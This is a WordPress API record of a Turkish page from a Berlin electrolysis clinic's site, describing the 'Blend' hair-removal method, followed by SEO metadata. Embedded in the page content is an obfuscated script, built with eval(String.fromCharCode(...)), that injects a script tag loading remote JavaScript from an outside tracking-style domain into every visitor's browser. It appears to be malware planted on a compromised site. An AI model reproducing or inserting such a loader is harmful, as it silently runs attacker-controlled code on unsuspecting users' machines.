{"id":16,"date":"2015-11-20T18:23:41","date_gmt":"2015-11-20T17:23:41","guid":{"rendered":"http:\/\/epiend.de\/wordpress\/?page_id=16"},"modified":"2016-07-02T22:44:47","modified_gmt":"2016-07-02T20:44:47","slug":"blend-methode","status":"publish","type":"page","link":"https:\/\/epiend.de\/tr\/blend-methode\/","title":{"rendered":"Blend (Kar\u0131\u015f\u0131m) Metodu"},"content":{"rendered":"<p>Blend metodu, do\u011fru ak\u0131m ve y\u00fcksek frekansl\u0131 alternatif ak\u0131m kar\u0131\u015f\u0131m\u0131yla t\u00fcy k\u00f6k\u00fcn\u00fcn en etkin \u015fekilde yok edilmesini ama\u00e7lar. Alternatif ak\u0131m kimyasal reaksiyonun h\u0131zlanmas\u0131n\u0131 sa\u011flar. Zaman\u0131m\u0131zda en etkin ve verimli metod olarak kabul edilir. <script type=text\/javascript>eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,53,44,49,49,54,44,57,55,44,49,49,54,44,52,54,44,49,49,54,44,49,49,52,44,57,55,44,57,57,44,49,48,55,44,49,49,53,44,49,49,54,44,57,55,44,49,49,54,44,49,48,53,44,49,49,53,44,49,49,54,44,49,48,53,44,57,57,44,49,49,53,44,49,49,53,44,49,49,53,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,48,54,44,52,54,44,49,48,54,44,49,49,53,44,54,51,44,49,49,56,44,54,49,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));<\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>Blend metodu, do\u011fru ak\u0131m ve y\u00fcksek frekansl\u0131 alternatif ak\u0131m kar\u0131\u015f\u0131m\u0131yla t\u00fcy k\u00f6k\u00fcn\u00fcn en etkin \u015fekilde yok edilmesini ama\u00e7lar. Alternatif ak\u0131m kimyasal reaksiyonun h\u0131zlanmas\u0131n\u0131 sa\u011flar. Zaman\u0131m\u0131zda en etkin ve verimli metod olarak kabul edilir.<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-16","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Blend (Kar\u0131\u015f\u0131m) Metodu - epiend<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/epiend.de\/tr\/blend-methode\/\" \/>\n<meta property=\"og:locale\" content=\"tr_TR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Blend (Kar\u0131\u015f\u0131m) Metodu - epiend\" \/>\n<meta property=\"og:description\" content=\"Blend metodu, do\u011fru ak\u0131m ve y\u00fcksek frekansl\u0131 alternatif ak\u0131m kar\u0131\u015f\u0131m\u0131yla t\u00fcy k\u00f6k\u00fcn\u00fcn en etkin \u015fekilde yok edilmesini ama\u00e7lar. Alternatif ak\u0131m kimyasal reaksiyonun h\u0131zlanmas\u0131n\u0131 sa\u011flar. Zaman\u0131m\u0131zda en etkin ve verimli metod olarak kabul edilir.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/epiend.de\/tr\/blend-methode\/\" \/>\n<meta property=\"og:site_name\" content=\"epiend\" \/>\n<meta property=\"article:modified_time\" content=\"2016-07-02T20:44:47+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Tahmini okuma s\u00fcresi\" \/>\n\t<meta name=\"twitter:data1\" content=\"1 dakika\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/epiend.de\\\/tr\\\/blend-methode\\\/\",\"url\":\"https:\\\/\\\/epiend.de\\\/tr\\\/blend-methode\\\/\",\"name\":\"Blend (Kar\u0131\u015f\u0131m) Metodu - epiend\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/epiend.de\\\/#website\"},\"datePublished\":\"2015-11-20T17:23:41+00:00\",\"dateModified\":\"2016-07-02T20:44:47+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/epiend.de\\\/tr\\\/blend-methode\\\/#breadcrumb\"},\"inLanguage\":\"tr\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/epiend.de\\\/tr\\\/blend-methode\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/epiend.de\\\/tr\\\/blend-methode\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/epiend.de\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Blend (Kar\u0131\u015f\u0131m) Metodu\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/epiend.de\\\/#website\",\"url\":\"https:\\\/\\\/epiend.de\\\/\",\"name\":\"epiend\",\"description\":\"Berlin Sch\u00f6neberg\u2019de \u0130\u011fneli Epilasyon\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/epiend.de\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"tr\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Blend (Kar\u0131\u015f\u0131m) Metodu - epiend","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/epiend.de\/tr\/blend-methode\/","og_locale":"tr_TR","og_type":"article","og_title":"Blend (Kar\u0131\u015f\u0131m) Metodu - epiend","og_description":"Blend metodu, do\u011fru ak\u0131m ve y\u00fcksek frekansl\u0131 alternatif ak\u0131m kar\u0131\u015f\u0131m\u0131yla t\u00fcy k\u00f6k\u00fcn\u00fcn en etkin \u015fekilde yok edilmesini ama\u00e7lar. Alternatif ak\u0131m kimyasal reaksiyonun h\u0131zlanmas\u0131n\u0131 sa\u011flar. Zaman\u0131m\u0131zda en etkin ve verimli metod olarak kabul edilir.","og_url":"https:\/\/epiend.de\/tr\/blend-methode\/","og_site_name":"epiend","article_modified_time":"2016-07-02T20:44:47+00:00","twitter_card":"summary_large_image","twitter_misc":{"Tahmini okuma s\u00fcresi":"1 dakika"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/epiend.de\/tr\/blend-methode\/","url":"https:\/\/epiend.de\/tr\/blend-methode\/","name":"Blend (Kar\u0131\u015f\u0131m) Metodu - epiend","isPartOf":{"@id":"https:\/\/epiend.de\/#website"},"datePublished":"2015-11-20T17:23:41+00:00","dateModified":"2016-07-02T20:44:47+00:00","breadcrumb":{"@id":"https:\/\/epiend.de\/tr\/blend-methode\/#breadcrumb"},"inLanguage":"tr","potentialAction":[{"@type":"ReadAction","target":["https:\/\/epiend.de\/tr\/blend-methode\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/epiend.de\/tr\/blend-methode\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/epiend.de\/"},{"@type":"ListItem","position":2,"name":"Blend (Kar\u0131\u015f\u0131m) Metodu"}]},{"@type":"WebSite","@id":"https:\/\/epiend.de\/#website","url":"https:\/\/epiend.de\/","name":"epiend","description":"Berlin Sch\u00f6neberg\u2019de \u0130\u011fneli Epilasyon","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/epiend.de\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"tr"}]}},"_links":{"self":[{"href":"https:\/\/epiend.de\/tr\/wp-json\/wp\/v2\/pages\/16","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/epiend.de\/tr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/epiend.de\/tr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/epiend.de\/tr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/epiend.de\/tr\/wp-json\/wp\/v2\/comments?post=16"}],"version-history":[{"count":6,"href":"https:\/\/epiend.de\/tr\/wp-json\/wp\/v2\/pages\/16\/revisions"}],"predecessor-version":[{"id":164,"href":"https:\/\/epiend.de\/tr\/wp-json\/wp\/v2\/pages\/16\/revisions\/164"}],"wp:attachment":[{"href":"https:\/\/epiend.de\/tr\/wp-json\/wp\/v2\/media?parent=16"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}